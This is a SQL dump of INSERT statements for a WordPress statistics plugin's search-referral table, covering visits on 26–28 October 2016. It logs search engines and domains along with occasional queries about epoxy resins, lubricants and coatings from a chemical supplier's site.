INSERT INTO `wp_statistics_search` VALUES (2888, '2016-10-26', 'google', 'www.google.so', 'uses of polymerisarion', 12268); 
INSERT INTO `wp_statistics_search` VALUES (2889, '2016-10-26', 'google', 'www.google.ca', '', 12269); 
INSERT INTO `wp_statistics_search` VALUES (2890, '2016-10-26', 'google', 'www.google.com', '', 12270); 
INSERT INTO `wp_statistics_search` VALUES (2891, '2016-10-26', 'google', 'www.google.com', '', 12272); 
INSERT INTO `wp_statistics_search` VALUES (2892, '2016-10-26', 'google', 'www.google.com', '', 12275); 
INSERT INTO `wp_statistics_search` VALUES (2893, '2016-10-26', 'google', 'www.google.ca', '', 12276); 
INSERT INTO `wp_statistics_search` VALUES (2894, '2016-10-26', 'yahoo', 'search.yahoo.com', '', 12281); 
INSERT INTO `wp_statistics_search` VALUES (2895, '2016-10-26', 'google', 'www.google.ca', '', 12289); 
INSERT INTO `wp_statistics_search` VALUES (2896, '2016-10-26', 'google', 'www.google.com', '', 12290); 
INSERT INTO `wp_statistics_search` VALUES (2897, '2016-10-26', 'yahoo', 'r.search.yahoo.com', '', 12295); 
INSERT INTO `wp_statistics_search` VALUES (2898, '2016-10-26', 'google', 'www.google.com', '', 12296); 
INSERT INTO `wp_statistics_search` VALUES (2899, '2016-10-26', 'google', 'www.google.com', '', 12302); 
INSERT INTO `wp_statistics_search` VALUES (2900, '2016-10-26', 'google', 'www.google.com', '', 12304); 
INSERT INTO `wp_statistics_search` VALUES (2901, '2016-10-26', 'google', 'www.google.az', '', 12305); 
INSERT INTO `wp_statistics_search` VALUES (2902, '2016-10-26', 'google', 'www.google.com', '', 12311); 
INSERT INTO `wp_statistics_search` VALUES (2903, '2016-10-26', 'google', 'www.google.com', '', 12312); 
INSERT INTO `wp_statistics_search` VALUES (2904, '2016-10-26', 'google', 'www.google.com', '', 12313); 
INSERT INTO `wp_statistics_search` VALUES (2905, '2016-10-26', 'google', 'www.google.com', '', 12314); 
INSERT INTO `wp_statistics_search` VALUES (2906, '2016-10-26', 'google', 'www.google.com', '', 12316); 
INSERT INTO `wp_statistics_search` VALUES (2907, '2016-10-26', 'google', 'www.google.com', '', 12317); 
INSERT INTO `wp_statistics_search` VALUES (2908, '2016-10-26', 'google', 'www.google.com', '', 12321); 
INSERT INTO `wp_statistics_search` VALUES (2909, '2016-10-26', 'google', 'www.google.com', '', 12323); 
INSERT INTO `wp_statistics_search` VALUES (2910, '2016-10-26', 'google', 'www.google.com', '', 12324); 
INSERT INTO `wp_statistics_search` VALUES (2911, '2016-10-26', 'google', 'www.google.ca', '', 12325); 
INSERT INTO `wp_statistics_search` VALUES (2912, '2016-10-26', 'google', 'www.google.com', '', 12326); 
INSERT INTO `wp_statistics_search` VALUES (2913, '2016-10-26', 'google', 'www.google.com', '', 12329); 
INSERT INTO `wp_statistics_search` VALUES (2914, '2016-10-26', 'google', 'www.google.com', '', 12335); 
INSERT INTO `wp_statistics_search` VALUES (2915, '2016-10-26', 'google', 'www.google.com', '', 12338); 
INSERT INTO `wp_statistics_search` VALUES (2916, '2016-10-26', 'google', 'www.google.com.ua', '', 12339); 
INSERT INTO `wp_statistics_search` VALUES (2917, '2016-10-26', 'google', 'www.google.com', '', 12340); 
INSERT INTO `wp_statistics_search` VALUES (2918, '2016-10-26', 'google', 'www.google.com', '', 12341); 
INSERT INTO `wp_statistics_search` VALUES (2919, '2016-10-26', 'google', 'www.google.com', '', 12342); 
INSERT INTO `wp_statistics_search` VALUES (2920, '2016-10-26', 'google', 'www.google.com', '', 12346); 
INSERT INTO `wp_statistics_search` VALUES (2921, '2016-10-26', 'google', 'www.google.cl', '', 12348); 
INSERT INTO `wp_statistics_search` VALUES (2922, '2016-10-26', 'google', 'www.google.com', '', 12349); 
INSERT INTO `wp_statistics_search` VALUES (2923, '2016-10-26', 'bing', 'www.bing.com', 'miller 55 BACKUS AVE DANBURY, CT 06810', 12353); 
INSERT INTO `wp_statistics_search` VALUES (2924, '2016-10-26', 'google', 'www.google.ca', '', 12355); 
INSERT INTO `wp_statistics_search` VALUES (2925, '2016-10-26', 'google', 'www.google.com', '', 12364); 
INSERT INTO `wp_statistics_search` VALUES (2926, '2016-10-26', 'google', 'www.google.com.mx', '', 12367); 
INSERT INTO `wp_statistics_search` VALUES (2927, '2016-10-26', 'google', 'www.google.com', '', 12368); 
INSERT INTO `wp_statistics_search` VALUES (2928, '2016-10-26', 'google', 'www.google.com', '', 12372); 
INSERT INTO `wp_statistics_search` VALUES (2929, '2016-10-26', 'google', 'www.google.de', '', 12373); 
INSERT INTO `wp_statistics_search` VALUES (2930, '2016-10-26', 'google', 'www.google.ca', '', 12376); 
INSERT INTO `wp_statistics_search` VALUES (2931, '2016-10-26', 'google', 'www.google.com', '', 12377); 
INSERT INTO `wp_statistics_search` VALUES (2932, '2016-10-26', 'google', 'www.google.com', '', 12381); 
INSERT INTO `wp_statistics_search` VALUES (2933, '2016-10-26', 'google', 'www.google.com', '', 12382); 
INSERT INTO `wp_statistics_search` VALUES (2934, '2016-10-26', 'google', 'www.google.com', '', 12384); 
INSERT INTO `wp_statistics_search` VALUES (2935, '2016-10-26', 'google', 'www.google.com', '', 12388); 
INSERT INTO `wp_statistics_search` VALUES (2936, '2016-10-26', 'google', 'www.google.com', '', 12392); 
INSERT INTO `wp_statistics_search` VALUES (2937, '2016-10-26', 'google', 'www.google.com', '', 12393); 
INSERT INTO `wp_statistics_search` VALUES (2938, '2016-10-26', 'yahoo', 'r.search.yahoo.com', '', 12396); 
INSERT INTO `wp_statistics_search` VALUES (2939, '2016-10-26', 'google', 'www.google.com', '', 12397); 
INSERT INTO `wp_statistics_search` VALUES (2940, '2016-10-26', 'google', 'www.google.com', '', 12405); 
INSERT INTO `wp_statistics_search` VALUES (2941, '2016-10-26', 'google', 'www.google.com', '', 12411); 
INSERT INTO `wp_statistics_search` VALUES (2942, '2016-10-26', 'google', 'www.google.com', '', 12413); 
INSERT INTO `wp_statistics_search` VALUES (2943, '2016-10-26', 'google', 'www.google.com', '', 12415); 
INSERT INTO `wp_statistics_search` VALUES (2944, '2016-10-26', 'google', 'www.google.com', '', 12424); 
INSERT INTO `wp_statistics_search` VALUES (2945, '2016-10-26', 'google', 'www.google.com', 'hexion Epon resin 828', 12426); 
INSERT INTO `wp_statistics_search` VALUES (2946, '2016-10-26', 'google', 'www.google.com.mx', '', 12431); 
INSERT INTO `wp_statistics_search` VALUES (2947, '2016-10-26', 'google', 'www.google.com', '', 12434); 
INSERT INTO `wp_statistics_search` VALUES (2948, '2016-10-26', 'google', 'www.google.com', '', 12437); 
INSERT INTO `wp_statistics_search` VALUES (2949, '2016-10-26', 'google', 'www.google.com', '', 12440); 
INSERT INTO `wp_statistics_search` VALUES (2950, '2016-10-26', 'google', 'www.google.com', '', 12441); 
INSERT INTO `wp_statistics_search` VALUES (2951, '2016-10-26', 'google', 'www.google.com', '', 12442); 
INSERT INTO `wp_statistics_search` VALUES (2952, '2016-10-26', 'google', 'www.google.com', '', 12443); 
INSERT INTO `wp_statistics_search` VALUES (2953, '2016-10-26', 'google', 'www.google.ca', '', 12444); 
INSERT INTO `wp_statistics_search` VALUES (2954, '2016-10-26', 'duckduckgo', 'duckduckgo.com', '', 12450); 
INSERT INTO `wp_statistics_search` VALUES (2955, '2016-10-26', 'google', 'www.google.com', '', 12453); 
INSERT INTO `wp_statistics_search` VALUES (2956, '2016-10-26', 'google', 'www.google.com', '', 12455); 
INSERT INTO `wp_statistics_search` VALUES (2957, '2016-10-26', 'google', 'com.google.android.googlequicksearchbox', '', 12456); 
INSERT INTO `wp_statistics_search` VALUES (2958, '2016-10-26', 'google', 'www.google.com', '', 12457); 
INSERT INTO `wp_statistics_search` VALUES (2959, '2016-10-26', 'google', 'www.google.com.vn', '', 12465); 
INSERT INTO `wp_statistics_search` VALUES (2960, '2016-10-26', 'google', 'www.google.com', '', 12476); 
INSERT INTO `wp_statistics_search` VALUES (2961, '2016-10-26', 'google', 'www.google.com', '', 12477); 
INSERT INTO `wp_statistics_search` VALUES (2962, '2016-10-27', 'google', 'www.google.ca', '', 12481); 
INSERT INTO `wp_statistics_search` VALUES (2963, '2016-10-27', 'google', 'com.google.android.googlequicksearchbox', '', 12482); 
INSERT INTO `wp_statistics_search` VALUES (2964, '2016-10-27', 'google', 'www.google.com', '', 12491); 
INSERT INTO `wp_statistics_search` VALUES (2965, '2016-10-27', 'google', 'www.google.co.in', '', 12494); 
INSERT INTO `wp_statistics_search` VALUES (2966, '2016-10-27', 'google', 'www.google.com', 'ptfe release agents', 12499); 
INSERT INTO `wp_statistics_search` VALUES (2967, '2016-10-27', 'google', 'www.google.com', '', 12504); 
INSERT INTO `wp_statistics_search` VALUES (2968, '2016-10-27', 'baidu', 'transcoder.baidu.com', '', 12510); 
INSERT INTO `wp_statistics_search` VALUES (2969, '2016-10-27', 'google', 'www.google.com', '', 12511); 
INSERT INTO `wp_statistics_search` VALUES (2970, '2016-10-27', 'google', 'www.google.com', '', 12515); 
INSERT INTO `wp_statistics_search` VALUES (2971, '2016-10-27', 'google', 'www.google.com', '', 12516); 
INSERT INTO `wp_statistics_search` VALUES (2972, '2016-10-27', 'google', 'www.google.co.jp', '', 12523); 
INSERT INTO `wp_statistics_search` VALUES (2973, '2016-10-27', 'google', 'www.google.com', '', 12524); 
INSERT INTO `wp_statistics_search` VALUES (2974, '2016-10-27', 'google', 'www.google.com', '', 12525); 
INSERT INTO `wp_statistics_search` VALUES (2975, '2016-10-27', 'google', 'www.google.com', '', 12532); 
INSERT INTO `wp_statistics_search` VALUES (2976, '2016-10-27', 'google', 'www.google.com.vn', '', 12552); 
INSERT INTO `wp_statistics_search` VALUES (2977, '2016-10-27', 'google', 'www.google.com', '', 12553); 
INSERT INTO `wp_statistics_search` VALUES (2978, '2016-10-27', 'google', 'www.google.com', '', 12554); 
INSERT INTO `wp_statistics_search` VALUES (2979, '2016-10-27', 'google', 'www.google.fr', '', 12561); 
INSERT INTO `wp_statistics_search` VALUES (2980, '2016-10-27', 'google', 'www.google.co.in', '', 12568); 
INSERT INTO `wp_statistics_search` VALUES (2981, '2016-10-27', 'google', 'www.google.de', '', 12574); 
INSERT INTO `wp_statistics_search` VALUES (2982, '2016-10-27', 'google', 'www.google.hu', '', 12575); 
INSERT INTO `wp_statistics_search` VALUES (2983, '2016-10-27', 'google', 'google.com', 'anonymous', 12577); 
INSERT INTO `wp_statistics_search` VALUES (2984, '2016-10-27', 'google', 'www.google.co.kr', '', 12580); 
INSERT INTO `wp_statistics_search` VALUES (2985, '2016-10-27', 'google', 'www.google.com', '', 12581); 
INSERT INTO `wp_statistics_search` VALUES (2986, '2016-10-27', 'google', 'www.google.com', '', 12582); 
INSERT INTO `wp_statistics_search` VALUES (2987, '2016-10-27', 'google', 'www.google.ch', '', 12584); 
INSERT INTO `wp_statistics_search` VALUES (2988, '2016-10-27', 'google', 'www.google.hu', '', 12587); 
INSERT INTO `wp_statistics_search` VALUES (2989, '2016-10-27', 'bing', 'www.bing.com', 'opteon sion', 12589); 
INSERT INTO `wp_statistics_search` VALUES (2990, '2016-10-27', 'google', 'www.google.ca', '', 12592); 
INSERT INTO `wp_statistics_search` VALUES (2991, '2016-10-27', 'google', 'www.google.co.kr', '', 12593); 
INSERT INTO `wp_statistics_search` VALUES (2992, '2016-10-27', 'google', 'www.google.co.th', '', 12596); 
INSERT INTO `wp_statistics_search` VALUES (2993, '2016-10-27', 'google', 'www.google.fr', '', 12599); 
INSERT INTO `wp_statistics_search` VALUES (2994, '2016-10-27', 'google', 'www.google.com', '', 12605); 
INSERT INTO `wp_statistics_search` VALUES (2995, '2016-10-27', 'google', 'www.google.com', '', 12608); 
INSERT INTO `wp_statistics_search` VALUES (2996, '2016-10-27', 'google', 'www.google.co.il', '', 12614); 
INSERT INTO `wp_statistics_search` VALUES (2997, '2016-10-27', 'google', 'www.google.com', '', 12615); 
INSERT INTO `wp_statistics_search` VALUES (2998, '2016-10-27', 'google', 'www.google.co.uk', '', 12635); 
INSERT INTO `wp_statistics_search` VALUES (2999, '2016-10-27', 'google', 'www.google.com', '', 12636); 
INSERT INTO `wp_statistics_search` VALUES (3000, '2016-10-27', 'google', 'www.google.fr', '', 12638); 
INSERT INTO `wp_statistics_search` VALUES (3001, '2016-10-27', 'google', 'www.google.co.in', '', 12640); 
INSERT INTO `wp_statistics_search` VALUES (3002, '2016-10-27', 'google', 'www.google.co.uk', '', 12641); 
INSERT INTO `wp_statistics_search` VALUES (3003, '2016-10-27', 'google', 'www.google.fr', '', 12644); 
INSERT INTO `wp_statistics_search` VALUES (3004, '2016-10-27', 'google', 'google.com', '', 12646); 
INSERT INTO `wp_statistics_search` VALUES (3005, '2016-10-27', 'google', 'www.google.com.br', '', 12647); 
INSERT INTO `wp_statistics_search` VALUES (3006, '2016-10-27', 'google', 'www.google.ro', '', 12649); 
INSERT INTO `wp_statistics_search` VALUES (3007, '2016-10-27', 'google', 'www.google.it', '', 12651); 
INSERT INTO `wp_statistics_search` VALUES (3008, '2016-10-27', 'google', 'www.google.be', '', 12652); 
INSERT INTO `wp_statistics_search` VALUES (3009, '2016-10-27', 'google', 'www.google.com', '', 12654); 
INSERT INTO `wp_statistics_search` VALUES (3010, '2016-10-27', 'google', 'www.google.com', '', 12657); 
INSERT INTO `wp_statistics_search` VALUES (3011, '2016-10-27', 'google', 'www.google.com', '', 12658); 
INSERT INTO `wp_statistics_search` VALUES (3012, '2016-10-27', 'google', 'www.google.fr', '', 12659); 
INSERT INTO `wp_statistics_search` VALUES (3013, '2016-10-27', 'google', 'www.google.com', '', 12661); 
INSERT INTO `wp_statistics_search` VALUES (3014, '2016-10-27', 'bing', 'www.bing.com', 'buy MS-470N', 12663); 
INSERT INTO `wp_statistics_search` VALUES (3015, '2016-10-27', 'google', 'www.google.com', '', 12664); 
INSERT INTO `wp_statistics_search` VALUES (3016, '2016-10-27', 'google', 'www.google.com', '', 12665); 
INSERT INTO `wp_statistics_search` VALUES (3017, '2016-10-27', 'google', 'www.google.com.au', '', 12666); 
INSERT INTO `wp_statistics_search` VALUES (3018, '2016-10-27', 'google', 'www.google.de', '', 12669); 
INSERT INTO `wp_statistics_search` VALUES (3019, '2016-10-27', 'google', 'www.google.com', '', 12671); 
INSERT INTO `wp_statistics_search` VALUES (3020, '2016-10-27', 'google', 'www.google.com', '', 12673); 
INSERT INTO `wp_statistics_search` VALUES (3021, '2016-10-27', 'google', 'www.google.com', '', 12676); 
INSERT INTO `wp_statistics_search` VALUES (3022, '2016-10-27', 'google', 'www.google.com', '', 12679); 
INSERT INTO `wp_statistics_search` VALUES (3023, '2016-10-27', 'google', 'www.google.com', '', 12682); 
INSERT INTO `wp_statistics_search` VALUES (3024, '2016-10-27', 'google', 'www.google.fr', '', 12683); 
INSERT INTO `wp_statistics_search` VALUES (3025, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12686); 
INSERT INTO `wp_statistics_search` VALUES (3026, '2016-10-27', 'google', 'www.google.com', '', 12687); 
INSERT INTO `wp_statistics_search` VALUES (3027, '2016-10-27', 'bing', 'www.bing.com', 'aero duster miller stephenson msds', 12689); 
INSERT INTO `wp_statistics_search` VALUES (3028, '2016-10-27', 'google', 'www.google.co.uk', '', 12690); 
INSERT INTO `wp_statistics_search` VALUES (3029, '2016-10-27', 'google', 'www.google.com', '', 12694); 
INSERT INTO `wp_statistics_search` VALUES (3030, '2016-10-27', 'google', 'www.google.com', '', 12696); 
INSERT INTO `wp_statistics_search` VALUES (3031, '2016-10-27', 'google', 'www.google.ie', '', 12697); 
INSERT INTO `wp_statistics_search` VALUES (3032, '2016-10-27', 'google', 'www.google.com', '', 12698); 
INSERT INTO `wp_statistics_search` VALUES (3033, '2016-10-27', 'google', 'www.google.com', '', 12701); 
INSERT INTO `wp_statistics_search` VALUES (3034, '2016-10-27', 'google', 'www.google.com', '', 12703); 
INSERT INTO `wp_statistics_search` VALUES (3035, '2016-10-27', 'google', 'www.google.be', '', 12704); 
INSERT INTO `wp_statistics_search` VALUES (3036, '2016-10-27', 'google', 'www.google.com', '', 12712); 
INSERT INTO `wp_statistics_search` VALUES (3037, '2016-10-27', 'google', 'www.google.com', '', 12713); 
INSERT INTO `wp_statistics_search` VALUES (3038, '2016-10-27', 'google', 'www.google.com', '', 12714); 
INSERT INTO `wp_statistics_search` VALUES (3039, '2016-10-27', 'google', 'www.google.co.in', '', 12718); 
INSERT INTO `wp_statistics_search` VALUES (3040, '2016-10-27', 'google', 'www.google.com', '', 12719); 
INSERT INTO `wp_statistics_search` VALUES (3041, '2016-10-27', 'google', 'www.google.com', '', 12721); 
INSERT INTO `wp_statistics_search` VALUES (3042, '2016-10-27', 'google', 'www.google.com', '', 12722); 
INSERT INTO `wp_statistics_search` VALUES (3043, '2016-10-27', 'google', 'www.google.com', '', 12723); 
INSERT INTO `wp_statistics_search` VALUES (3044, '2016-10-27', 'google', 'www.google.com', '', 12725); 
INSERT INTO `wp_statistics_search` VALUES (3045, '2016-10-27', 'google', 'www.google.ca', '', 12726); 
INSERT INTO `wp_statistics_search` VALUES (3046, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12727); 
INSERT INTO `wp_statistics_search` VALUES (3047, '2016-10-27', 'google', 'www.google.ca', '', 12728); 
INSERT INTO `wp_statistics_search` VALUES (3048, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12732); 
INSERT INTO `wp_statistics_search` VALUES (3049, '2016-10-27', 'google', 'www.google.com', '', 12733); 
INSERT INTO `wp_statistics_search` VALUES (3050, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12734); 
INSERT INTO `wp_statistics_search` VALUES (3051, '2016-10-27', 'google', 'www.google.ca', '', 12735); 
INSERT INTO `wp_statistics_search` VALUES (3052, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12736); 
INSERT INTO `wp_statistics_search` VALUES (3053, '2016-10-27', 'google', 'www.google.com', '', 12738); 
INSERT INTO `wp_statistics_search` VALUES (3054, '2016-10-27', 'google', 'www.google.com', '', 12743); 
INSERT INTO `wp_statistics_search` VALUES (3055, '2016-10-27', 'google', 'www.google.com', '', 12744); 
INSERT INTO `wp_statistics_search` VALUES (3056, '2016-10-27', 'google', 'www.google.com', '', 12747); 
INSERT INTO `wp_statistics_search` VALUES (3057, '2016-10-27', 'google', 'www.google.ru', '', 12748); 
INSERT INTO `wp_statistics_search` VALUES (3058, '2016-10-27', 'google', 'www.google.com', '', 12751); 
INSERT INTO `wp_statistics_search` VALUES (3059, '2016-10-27', 'google', 'www.google.com', '', 12752); 
INSERT INTO `wp_statistics_search` VALUES (3060, '2016-10-27', 'bing', 'www.bing.com', 'xht-bdx grease', 12754); 
INSERT INTO `wp_statistics_search` VALUES (3061, '2016-10-27', 'google', 'www.google.com', '', 12756); 
INSERT INTO `wp_statistics_search` VALUES (3062, '2016-10-27', 'bing', 'www.bing.com', 'crazing resistance in coatings', 12758); 
INSERT INTO `wp_statistics_search` VALUES (3063, '2016-10-27', 'google', 'www.google.com', '', 12761); 
INSERT INTO `wp_statistics_search` VALUES (3064, '2016-10-27', 'google', 'www.google.com.sa', '', 12762); 
INSERT INTO `wp_statistics_search` VALUES (3065, '2016-10-27', 'google', 'www.google.com', '', 12763); 
INSERT INTO `wp_statistics_search` VALUES (3066, '2016-10-27', 'google', 'www.google.com', '', 12764); 
INSERT INTO `wp_statistics_search` VALUES (3067, '2016-10-27', 'google', 'www.google.com', '', 12765); 
INSERT INTO `wp_statistics_search` VALUES (3068, '2016-10-27', 'google', 'www.google.ca', '', 12766); 
INSERT INTO `wp_statistics_search` VALUES (3069, '2016-10-27', 'google', 'www.google.com', '', 12767); 
INSERT INTO `wp_statistics_search` VALUES (3070, '2016-10-27', 'google', 'www.google.com', '', 12768); 
INSERT INTO `wp_statistics_search` VALUES (3071, '2016-10-27', 'google', 'www.google.com', '', 12771); 
INSERT INTO `wp_statistics_search` VALUES (3072, '2016-10-27', 'google', 'www.google.com', '', 12774); 
INSERT INTO `wp_statistics_search` VALUES (3073, '2016-10-27', 'bing', 'www.bing.com', 'miller stevenson', 12775); 
INSERT INTO `wp_statistics_search` VALUES (3074, '2016-10-27', 'google', 'www.google.ca', '', 12776); 
INSERT INTO `wp_statistics_search` VALUES (3075, '2016-10-27', 'google', 'www.google.com', '', 12778); 
INSERT INTO `wp_statistics_search` VALUES (3076, '2016-10-27', 'google', 'www.google.com', '', 12779); 
INSERT INTO `wp_statistics_search` VALUES (3077, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12784); 
INSERT INTO `wp_statistics_search` VALUES (3078, '2016-10-27', 'google', 'www.google.com', '', 12788); 
INSERT INTO `wp_statistics_search` VALUES (3079, '2016-10-27', 'google', 'www.google.com', '', 12789); 
INSERT INTO `wp_statistics_search` VALUES (3080, '2016-10-27', 'google', 'www.google.com', '', 12791); 
INSERT INTO `wp_statistics_search` VALUES (3081, '2016-10-27', 'google', 'www.google.com', '', 12792); 
INSERT INTO `wp_statistics_search` VALUES (3082, '2016-10-27', 'google', 'www.google.com', '', 12793); 
INSERT INTO `wp_statistics_search` VALUES (3083, '2016-10-27', 'google', 'www.google.com', '', 12794); 
INSERT INTO `wp_statistics_search` VALUES (3084, '2016-10-27', 'google', 'www.google.com', '', 12795); 
INSERT INTO `wp_statistics_search` VALUES (3085, '2016-10-27', 'google', 'www.google.ru', '', 12797); 
INSERT INTO `wp_statistics_search` VALUES (3086, '2016-10-27', 'google', 'www.google.com.mx', '', 12798); 
INSERT INTO `wp_statistics_search` VALUES (3087, '2016-10-27', 'google', 'www.google.com', '', 12799); 
INSERT INTO `wp_statistics_search` VALUES (3088, '2016-10-27', 'google', 'www.google.com', '', 12801); 
INSERT INTO `wp_statistics_search` VALUES (3089, '2016-10-27', 'google', 'www.google.com', '', 12804); 
INSERT INTO `wp_statistics_search` VALUES (3090, '2016-10-27', 'google', 'www.google.com', '', 12808); 
INSERT INTO `wp_statistics_search` VALUES (3091, '2016-10-27', 'bing', 'www.bing.com', 'MILLER STEPHENSON', 12810); 
INSERT INTO `wp_statistics_search` VALUES (3092, '2016-10-27', 'google', 'www.google.com', '', 12812); 
INSERT INTO `wp_statistics_search` VALUES (3093, '2016-10-27', 'google', 'www.google.com', '', 12813); 
INSERT INTO `wp_statistics_search` VALUES (3094, '2016-10-27', 'google', 'www.google.com', '', 12821); 
INSERT INTO `wp_statistics_search` VALUES (3095, '2016-10-27', 'google', 'www.google.com', '', 12822); 
INSERT INTO `wp_statistics_search` VALUES (3096, '2016-10-27', 'bing', 'www.bing.com', 'epikure 3282', 12824); 
INSERT INTO `wp_statistics_search` VALUES (3097, '2016-10-27', 'google', 'www.google.com', '', 12827); 
INSERT INTO `wp_statistics_search` VALUES (3098, '2016-10-27', 'bing', 'www.bing.com', 'urethane conformal coating ms-472c data sheet', 12828); 
INSERT INTO `wp_statistics_search` VALUES (3099, '2016-10-27', 'google', 'www.google.com', '', 12829); 
INSERT INTO `wp_statistics_search` VALUES (3100, '2016-10-27', 'google', 'www.google.com', '', 12830); 
INSERT INTO `wp_statistics_search` VALUES (3101, '2016-10-27', 'google', 'www.google.com', '', 12831); 
INSERT INTO `wp_statistics_search` VALUES (3102, '2016-10-27', 'bing', 'www.bing.com', 'how to remove pfpe oil', 12832); 
INSERT INTO `wp_statistics_search` VALUES (3103, '2016-10-27', 'google', 'www.google.com', '', 12835); 
INSERT INTO `wp_statistics_search` VALUES (3104, '2016-10-27', 'yahoo', 'r.search.yahoo.com', '', 12837); 
INSERT INTO `wp_statistics_search` VALUES (3105, '2016-10-27', 'google', 'www.google.com', '', 12839); 
INSERT INTO `wp_statistics_search` VALUES (3106, '2016-10-27', 'google', 'www.google.com', '', 12841); 
INSERT INTO `wp_statistics_search` VALUES (3107, '2016-10-27', 'google', 'www.google.com.mx', '', 12842); 
INSERT INTO `wp_statistics_search` VALUES (3108, '2016-10-27', 'google', 'www.google.com', '', 12843); 
INSERT INTO `wp_statistics_search` VALUES (3109, '2016-10-27', 'google', 'www.google.com', '', 12844); 
INSERT INTO `wp_statistics_search` VALUES (3110, '2016-10-27', 'bing', 'www.bing.com', 'EPON Resin 1001F Solid Epoxy Resin', 12847); 
INSERT INTO `wp_statistics_search` VALUES (3111, '2016-10-27', 'google', 'www.google.com', '', 12848); 
INSERT INTO `wp_statistics_search` VALUES (3112, '2016-10-27', 'google', 'www.google.com', '', 12849); 
INSERT INTO `wp_statistics_search` VALUES (3113, '2016-10-27', 'google', 'www.google.com', '', 12850); 
INSERT INTO `wp_statistics_search` VALUES (3114, '2016-10-27', 'google', 'www.google.gr', '', 12855); 
INSERT INTO `wp_statistics_search` VALUES (3115, '2016-10-27', 'google', 'www.google.com', '', 12857); 
INSERT INTO `wp_statistics_search` VALUES (3116, '2016-10-27', 'google', 'www.google.com', '', 12859); 
INSERT INTO `wp_statistics_search` VALUES (3117, '2016-10-27', 'google', 'www.google.com', '', 12862); 
INSERT INTO `wp_statistics_search` VALUES (3118, '2016-10-27', 'google', 'www.google.com', '', 12863); 
INSERT INTO `wp_statistics_search` VALUES (3119, '2016-10-27', 'google', 'www.google.ca', '', 12864); 
INSERT INTO `wp_statistics_search` VALUES (3120, '2016-10-27', 'google', 'www.google.com', '', 12865); 
INSERT INTO `wp_statistics_search` VALUES (3121, '2016-10-27', 'google', 'www.google.com', '', 12867); 
INSERT INTO `wp_statistics_search` VALUES (3122, '2016-10-27', 'bing', 'www.bing.com', 'heloxy 505', 12868); 
INSERT INTO `wp_statistics_search` VALUES (3123, '2016-10-27', 'google', 'www.google.com', '', 12872); 
INSERT INTO `wp_statistics_search` VALUES (3124, '2016-10-27', 'google', 'www.google.com', '', 12873); 
INSERT INTO `wp_statistics_search` VALUES (3125, '2016-10-27', 'google', 'www.google.com', '', 12875); 
INSERT INTO `wp_statistics_search` VALUES (3126, '2016-10-27', 'google', 'www.google.com', '', 12880); 
INSERT INTO `wp_statistics_search` VALUES (3127, '2016-10-27', 'google', 'www.google.com', '', 12892); 
INSERT INTO `wp_statistics_search` VALUES (3128, '2016-10-27', 'google', 'www.google.com', '', 12899); 
INSERT INTO `wp_statistics_search` VALUES (3129, '2016-10-27', 'google', 'www.google.com.au', '', 12954); 
INSERT INTO `wp_statistics_search` VALUES (3130, '2016-10-27', 'google', 'www.google.com', '', 12957); 
INSERT INTO `wp_statistics_search` VALUES (3131, '2016-10-27', 'google', 'www.google.com', '', 12958); 
INSERT INTO `wp_statistics_search` VALUES (3132, '2016-10-27', 'google', 'www.google.co.jp', '', 12959); 
INSERT INTO `wp_statistics_search` VALUES (3133, '2016-10-27', 'google', 'www.google.com.au', '', 12960); 
INSERT INTO `wp_statistics_search` VALUES (3134, '2016-10-28', 'yahoo', 'r.search.yahoo.com', '', 12963); 
INSERT INTO `wp_statistics_search` VALUES (3135, '2016-10-28', 'google', 'www.google.com', '', 12965); 
INSERT INTO `wp_statistics_search` VALUES (3136, '2016-10-28', 'google', 'www.google.com', '', 12966); 
INSERT INTO `wp_statistics_search` VALUES (3137, '2016-10-28', 'google', 'www.google.com', '', 12978); 
INSERT INTO `wp_statistics_search` VALUES (3138, '2016-10-28', 'google', 'www.google.com', '', 12979); 
INSERT INTO `wp_statistics_search` VALUES (3139, '2016-10-28', 'google', 'www.google.com', '', 12980); 
INSERT INTO `wp_statistics_search` VALUES (3140, '2016-10-28', 'google', 'www.google.com', '', 12986); 
INSERT INTO `wp_statistics_search` VALUES (3141, '2016-10-28', 'google', 'www.google.com', '', 12987); 
INSERT INTO `wp_statistics_search` VALUES (3142, '2016-10-28', 'bing', 'global.bing.com', 'krytox NRT 8908', 12999); 
INSERT INTO `wp_statistics_search` VALUES (3143, '2016-10-28', 'google', 'www.google.com', '', 13002); 
INSERT INTO `wp_statistics_search` VALUES (3144, '2016-10-28', 'google', 'www.google.com', '', 13010); 
INSERT INTO `wp_statistics_search` VALUES (3145, '2016-10-28', 'google', 'www.google.com', '', 13011); 
INSERT INTO `wp_statistics_search` VALUES (3146, '2016-10-28', 'google', 'www.google.co.in', '', 13012); 
INSERT INTO `wp_statistics_search` VALUES (3147, '2016-10-28', 'google', 'www.google.com.tw', '', 13017); 
INSERT INTO `wp_statistics_search` VALUES (3148, '2016-10-28', 'baidu', 'www.baidu.com', '', 13018); 
INSERT INTO `wp_statistics_search` VALUES (3149, '2016-10-28', 'google', 'www.google.com.au', '', 13021); 
INSERT INTO `wp_statistics_search` VALUES (3150, '2016-10-28', 'google', 'www.google.com', '', 13024); 
INSERT INTO `wp_statistics_search` VALUES (3151, '2016-10-28', 'google', 'www.google.com.tr', '', 13025); 
INSERT INTO `wp_statistics_search` VALUES (3152, '2016-10-28', 'google', 'www.google.com.tr', '', 13031); 
INSERT INTO `wp_statistics_search` VALUES (3153, '2016-10-28', 'google', 'www.google.fr', '', 13034); 
INSERT INTO `wp_statistics_search` VALUES (3154, '2016-10-28', 'google', 'www.google.nl', '', 13041); 
INSERT INTO `wp_statistics_search` VALUES (3155, '2016-10-28', 'google', 'www.google.com', '', 13045); 
INSERT INTO `wp_statistics_search` VALUES (3156, '2016-10-28', 'google', 'www.google.com', '', 13048); 
INSERT INTO `wp_statistics_search` VALUES (3157, '2016-10-28', 'google', 'www.google.com.br', '', 13049); 
INSERT INTO `wp_statistics_search` VALUES (3158, '2016-10-28', 'google', 'www.google.com', '', 13053); 
INSERT INTO `wp_statistics_search` VALUES (3159, '2016-10-28', 'google', 'www.google.com', '', 13059); 
INSERT INTO `wp_statistics_search` VALUES (3160, '2016-10-28', 'google', 'www.google.co.jp', '', 13061); 
INSERT INTO `wp_statistics_search` VALUES (3161, '2016-10-28', 'google', 'www.google.com', '', 13068); 
